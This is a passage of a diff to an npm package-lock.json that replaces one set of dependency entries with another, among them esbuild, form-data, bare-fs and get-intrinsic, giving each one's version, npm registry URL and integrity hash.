"sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, "requires": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" + "color-convert": "^2.0.1" } }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true + "argparse": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", + "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", + "asap": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/asap/-/asap-2.0.6.tgz", + "integrity": "sha1-5QNHYR1+aQlDIIu9r+vLwvuGbUY=" + }, + "asynckit": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", + "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=", "dev": true }, - "lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", + "b4a": { + "version": "1.6.7", + "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", + "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==", "dev": true }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", + "bare-events": { + "version": "2.6.0", + "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.6.0.tgz", + "integrity": "sha512-EKZ5BTXYExaNqi3I3f9RtEsaI/xBSGjE0XZCZilPzFAV/goswFHuPd9jEZlPIZ/iNZJwDSao9qRiScySz7MbQg==", + "dev": true, + "optional": true + }, + "bare-fs": { + "version": "4.1.6", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.6.tgz", + "integrity": "sha512-25RsLF33BqooOEFNdMcEhMpJy8EoR88zSMrnOQOaM3USnOK2VmaJ1uaQEwPA6AQjrv1lXChScosN6CzbwbO9OQ==", "dev": true, + "optional": true, "requires": { - "p-locate": "^4.1.0" + "bare-events": "^2.5.4", + "bare-path": "^3.0.0", + "bare-stream": "^2.6.4" } }, - "lodash": { - "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" - }, - "lodash.memoize": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", - "dev": true + "bare-os": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.1.tgz", + "integrity": "sha512-uaIjxokhFidJP+bmmvKSgiMzj2sV5GPHaZVAIktcxcpCyBFFWO+YlikVAdhmUo2vYFvFhOXIAlldqV29L8126g==", + "dev": true, + "optional": true }, - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "devOptional": true, + "bare-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", + "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", + "dev": true, + "optional": true, "requires": { - "yallist": "^4.0.0" + "bare-os": "^3.0.1" } }, - "make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", + "bare-stream": { + "version": "2.6.5", + "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", + "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", "dev": true, + "optional": true, "requires": { - "semver": "^6.0.0" + "streamx": "^2.21.0" } }, - "make-error": { - "version": "1.3.6", - "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", - "dev": true - }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", + "braces": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", + "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", "dev": true, "requires": { - "tmpl": "1.0.5" + "fill-range": "^7.1.1" } }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.4", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.4.tgz", - "integrity": "sha512-pRmzw/XUcwXGpD9aI9q/0XOwLNygjETJ8y0ao0wdqprrzDa4YnxLcz7fQRZr8voh8V10kGhABbNcHVk5wHgWwg==", + "call-bind-apply-helpers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", + "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", "dev": true, "requires": { - "braces": "^3.0.1", - "picomatch": "^2.2.3" + "es-errors": "^1.3.0", + "function-bind": "^1.1.2" } }, - "mime-db": { - "version": "1.49.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.49.0.tgz", - "integrity": "sha512-CIc8j9URtOVApSFCQIF+VBkX1RwXp/oMMOrqdyXSBXq5RWNEsRfyj1kiRnQgmNXmHxPoFIxOroKA3zcU9P+nAA==" + "chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "requires": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + } }, - "mime-types": { - "version": "2.1.32", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.32.tgz", - "integrity": "sha512-hJGaVS4G4c9TSMYh2n6SQAGrC4RnfU+daP8G7cSCmaqNjiOoUY0VHCMS42pxnQmVF1GWwFhbHWn3RIxCqTmZ9A==", + "color-convert": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "dev": true, "requires": { - "mime-db": "1.49.0" + "color-name": "~1.1.4" } }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", + "color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", "dev": true }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", + "combined-stream": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", + "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", + "dev": true, "requires": { - "brace-expansion": "^1.1.7" + "delayed-stream": "~1.0.0" } }, - "minipass": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.1.3.tgz", - "integrity": "sha512-Mgd2GdMVzY+x3IJ+oHnVM+KG3lA5c8tnabyJKmHSaG2kAGpudxuOf8ToDkhumF7UzME7DecbQE9uOZhNm7PuJg==", - "requires": { - "yallist": "^4.0.0" - } + "commander": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-5.1.0.tgz", + "integrity": "sha512-P0CysNDQ7rtVw4QIQtm+MRxV66vKFSvlsQvGYXZWR3qFU0jlMKHZZZgw8e+8DSah4UDKMqnknRDQz+xuQXQ/Zg==" }, - "minizlib": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", - "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", + "debug": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.1.tgz", + "integrity": "sha512-KcKCqiftBJcZr++7ykoDIEwSa3XWowTfNPo92BYxjXiyYEVrUQh2aLyhxBCwww+heortUFxEJYcRzosstTEBYQ==", + "dev": true, "requires": { - "minipass": "^3.0.0", - "yallist": "^4.0.0" + "ms": "^2.1.3" } }, - "mkdirp": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", - "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==" - }, - "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "delayed-stream": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", + "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=", "dev": true }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true + "dunder-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", + "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", + "dev": true, + "requires": { + "call-bind-apply-helpers": "^1.0.1", + "es-errors": "^1.3.0", + "gopd": "^1.2.0" + } }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha1-h6kGXNs1XTGC2PlM4RGIuCXGijs=", - "dev": true + "end-of-stream": { + "version": "1.4.5", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz", + "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==", + "dev": true, + "requires": { + "once": "^1.4.0" + } }, - "node-releases": { - "version": "1.1.74", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-1.1.74.tgz", - "integrity": "sha512-caJBVempXZPepZoZAPCWRTNxYQ+xtG/KAi4ozTA5A+nJ7IU+kLQCbqaUjb5Rwy14M9upBWiQ4NutcmW04LJSRw==", + "es-define-property": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==", "dev": true }, - "nodemailer": { - "version": "6.9.9", - "resolved": "https://registry.npmjs.org/nodemailer/-/nodemailer-6.9.9.tgz", - "integrity": "sha512-dexTll8zqQoVJEZPwQAKzxxtFn0qTnjdQTchoU6Re9BUUGBJiOy3YMn/0ShTW6J5M0dfQ1NeDeRTTl4oIWgQMA==" - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", + "es-errors": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", "dev": true }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", + "es-object-atoms": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", + "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", "dev": true, "requires": { - "path-key": "^3.0.0" + "es-errors": "^1.3.0" } }, - "nunjucks": { - "version": "3.2.4", - "resolved": "https://registry.npmjs.org/nunjucks/-/nunjucks-3.2.4.tgz", - "integrity": "sha512-26XRV6BhkgK0VOxfbU5cQI+ICFUtMLixv1noZn1tGU38kQH5A5nmmbk/O45xdyBhD1esk47nKrY0mvQpZIhRjQ==", - "requires": { - "a-sync-waterfall": "^1.0.0", - "asap": "^2.0.3", - "commander": "^5.1.0" + "es-set-tostringtag": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", + "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", + "dev": true, + "requires": { + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.6", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.2" + } + }, + "esbuild": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.25.6.tgz", + "integrity": "sha512-GVuzuUwtdsghE3ocJ9Bs8PNoF13HNQ5TXbEi2AhvVb8xU1Iwt9Fos9FEamfoee+u/TOsn7GUWc04lz46n2bbTg==", + "dev": true, + "requires": { + "@esbuild/aix-ppc64": "0.25.6", + "@esbuild/android-arm": "0.25.6", + "@esbuild/android-arm64": "0.25.6", + "@esbuild/android-x64": "0.25.6", + "@esbuild/darwin-arm64": "0.25.6", + "@esbuild/darwin-x64": "0.25.6", + "@esbuild/freebsd-arm64": "0.25.6", + "@esbuild/freebsd-x64": "0.25.6", + "@esbuild/linux-arm": "0.25.6", + "@esbuild/linux-arm64": "0.25.6", + "@esbuild/linux-ia32": "0.25.6", + "@esbuild/linux-loong64": "0.25.6", + "@esbuild/linux-mips64el": "0.25.6", + "@esbuild/linux-ppc64": "0.25.6", + "@esbuild/linux-riscv64": "0.25.6", + "@esbuild/linux-s390x": "0.25.6", + "@esbuild/linux-x64": "0.25.6", + "@esbuild/netbsd-arm64": "0.25.6", + "@esbuild/netbsd-x64": "0.25.6", + "@esbuild/openbsd-arm64": "0.25.6", + "@esbuild/openbsd-x64": "0.25.6", + "@esbuild/openharmony-arm64": "0.25.6", + "@esbuild/sunos-x64": "0.25.6", + "@esbuild/win32-arm64": "0.25.6", + "@esbuild/win32-ia32": "0.25.6", + "@esbuild/win32-x64": "0.25.6" } }, - "oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" - }, - "object-hash": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-2.2.0.tgz", - "integrity": "sha512-gScRMn0bS5fH+IuwyIFgnh9zBdo4DV+6GhygmWM9HyNJSgS0hScp1f5vjtm7oIIOiT9trXrShAkLFSc2IqKNgw==", - "optional": true - }, - "oidc-token-hash": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/oidc-token-hash/-/oidc-token-hash-5.0.1.tgz", - "integrity": "sha512-EvoOtz6FIEBzE+9q253HsLCVRiK/0doEJ2HCvvqMQb3dHZrP3WlJKYtJ55CRTw4jmYomzH4wkPuCj/I3ZvpKxQ==", - "optional": true + "escape-string-regexp": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", + "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", + "dev": true }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha1-WDsap3WWHUsROsF9nFC6753Xa9E=", - "requires": { - "wrappy": "1" - } + "fast-fifo": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", + "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==", + "dev": true }, - "onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", + "fill-range": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", + "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", "dev": true, "requires": { - "mimic-fn": "^2.1.0" - } - }, - "openid-client": { - "version": "5.4.0", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-5.4.0.tgz", - "integrity": "sha512-hgJa2aQKcM2hn3eyVtN12tEA45ECjTJPXCgUh5YzTzy9qwapCvmDTVPWOcWVL0d34zeQoQ/hbG9lJhl3AYxJlQ==", - "optional": true, - "requires": { - "jose": "^4.10.0", - "lru-cache": "^6.0.0", - "object-hash": "^2.0.1", - "oidc-token-hash": "^5.0.1" + "to-regex-range": "^5.0.1" } }, - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "form-data": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.3.tgz", + "integrity": "sha512-qsITQPfmvMOSAdeyZ+12I1c+CKSstAFAwu+97zrnWAbIr5u8wfsExUzCesVLC8NgHuRUqNN4Zy6UPWUTRGslcA==", "dev": true, "requires": { - "p-try": "^2.0.0" + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "es-set-tostringtag": "^2.1.0", + "hasown": "^2.0.2", + "mime-types": "^2.1.12" } }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", + "function-bind": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", + "dev": true + }, + "get-intrinsic": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", + "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", "dev": true, "requires": { - "p-limit": "^2.2.0" + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "function-bind": "^1.1.2", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "math-intrinsics": "^1.1.0" } }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true - }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", + "get-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", + "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", "dev": true, "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" + "dunder-proto": "^1.0.1", + "es-object-atoms": "^1.0.0" } }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", + "gopd": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", + "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==", "dev": true }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha1-F0uSaHNVNP+8es5r9TpanhtcX18=" + "graceful-fs": { + "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", + "dev": true }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", + "has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", "dev": true }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", + "has-symbols": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==", "dev": true }, - "performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=" + "has-tostringtag": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", + "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", + "dev": true, + "requires": { + "has-symbols": "^1.0.3" + } }, - "picomatch": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.0.tgz", - "integrity": "sha512-lY1Q/PiJGC2zOv/z391WOTD+Z02bCgsFfvxoXXf6h7kv9o+WmsmzYqrAwY63sNgOxE4xEdq0WyUnXfKeBrSvYw==", - "dev": true + "hasown": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", + "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", + "dev": true, + "requires": { + "function-bind": "^1.1.2" + } }, - "pirates": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.5.tgz", - "integrity": "sha512-8V9+HQPupnaXMA23c5hvl69zXvTwTzyAYasnkb0Tts4XvO4CliqONMOnvlq26rkhLC3nWDFBJf73LU1e1VZLaQ==", + "hpagent": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": 